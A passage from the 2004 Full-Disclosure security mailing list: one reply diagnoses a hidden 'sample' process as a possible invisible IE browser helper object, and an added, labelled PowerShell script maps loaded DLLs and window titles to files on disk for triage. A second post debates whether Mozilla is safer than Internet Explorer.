> Firewall nor as a toolbar, and there is no new process running on
> the sandbox machine. But whenever I try to shut it down or reboot
> it, an application called "sample" does not want to terminate
> voluntarily. As said before, there is no such app in the process
> list before shutting down, and there is no unknown sample*.* file
> on any of the sandbox's hard disks. Does anyone know this "sample"?

In win2k there is an API which makes the process invisible. Can you get the exact plugin that is causing this? Internet Explorer has some browser objects that have access to whatever IE has, and there might be no visible toolbar, i.e. it might be 1x1 pixels big. So you see nothing, and there is no listed process as it is a part of Internet Explorer. Is IE running all the time?

It also might be an out-of-process COM server created by IE that refuses to shut down.

The sample*.* does not exist because it might be spawned by some other process and cleaned up on execution, or the "sample" might be the "window title" param and not the file name. Please get a program that maps the programs that are running to file names on disk, and that should be able to get what is going on ....

-aditya
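The kind of "map what is running to files on disk" check Aditya asks for, as an added example that is not part of any post in this thread: it lists the Browser Helper Objects registered for IE and resolves each CLSID to its DLL, shows which of those DLLs are actually loaded inside running iexplore.exe processes, and resolves a window title such as "sample" to the image path of the process owning it. It assumes a modern Windows host with PowerShell (not the Win2k box in the post); the registry paths are the standard BHO and CLSID locations.

```powershell
# Added example (not from the list posts). Maps BHOs, IE-loaded modules and a
# window title back to image files on disk, for malware triage on a sandbox.
$Title = 'sample'   # constructed search term, taken from the original report

# 1. BHOs are registered by CLSID under this key; the DLL that IE loads is the
#    default value of the CLSID's InProcServer32 subkey. On 64-bit Windows the
#    32-bit IE reads the same keys under ...\SOFTWARE\Wow6432Node\... as well.
$BhoKey  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects'
$BhoDlls = @()
Write-Host "== Registered Browser Helper Objects =="
if (Test-Path $BhoKey) {
    foreach ($bho in Get-ChildItem $BhoKey) {
        $clsid = $bho.PSChildName
        $srv   = "HKLM:\SOFTWARE\Classes\CLSID\$clsid\InProcServer32"
        $dll   = if (Test-Path $srv) { (Get-ItemProperty $srv).'(default)' }
                 else { '<no InProcServer32 key>' }
        $BhoDlls += $dll
        [pscustomobject]@{ CLSID = $clsid; Dll = $dll } | Format-Table -AutoSize
    }
} else {
    Write-Host "no BHO key present"
}

# 2. A BHO never shows up as its own process: it is a DLL inside IE. Listing
#    the modules of each iexplore.exe shows every DLL it has loaded and flags
#    the ones that came from the BHO registration above.
Write-Host "== Modules loaded into iexplore.exe =="
Get-Process -Name iexplore -ErrorAction SilentlyContinue | ForEach-Object {
    $proc = $_
    $proc.Modules | ForEach-Object {
        [pscustomobject]@{
            PID    = $proc.Id
            Module = $_.FileName
            IsBho  = ($BhoDlls -contains $_.FileName)   # string compare is case-insensitive
        }
    }
} | Sort-Object IsBho -Descending | Format-Table -AutoSize

# 3. "sample" may be a window title rather than a file name. Resolve any
#    process whose main window title matches it to the executable on disk.
Write-Host "== Processes whose window title matches '$Title' =="
Get-Process |
    Where-Object { $_.MainWindowTitle -like "*$Title*" } |
    Select-Object Id, ProcessName, MainWindowTitle, Path |
    Format-Table -AutoSize
```

Run it in an elevated prompt while the offending window is on screen, since a window that only appears during shutdown will not be found by step 3 afterwards.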

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] IE exploit runs code from graphics?

From: Jimmy Mitchener (packetmastergmail.com)
Date: Sat Jun 26 2004 - 21:12:36 CDT


On Sat, 26 Jun 2004 11:52:08 +0530, Aditya, ALD [ Aditya Lalit
Deshmukh ] <aditya.deshmukhonline.gateway.technolabs.net> wrote:
>
> > files (.CHM) from some web site, causing the HTML code inside the .CHM
> > to be run in the "My Computer" security zone. Typically (like all but
> > one of _dozens and dozens_ of these I've seen) the "inner" HTML run
>
> This is one of the _dozens and dozens_ of reasons to use Mozilla on untrusted sites, and to use IE to access internal websites if they depend on some IE features, but set the default browser to Mozilla so that whenever the user clicks something it opens in Mozilla.

Why would you assume Mozilla is any less vulnerable? Perhaps not
publicly; it is simply not as large a target as IE. You should
really not be browsing on an "important" system no matter what. Unless
perhaps you have systrace or SELinux guarding it (which even then is
not 100%).

Jimmy.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] RE: Text message

From: Shaunige (shaunigeyahoo.co.uk)
Date: Sat Jun 26 2004 - 23:49:47 CDT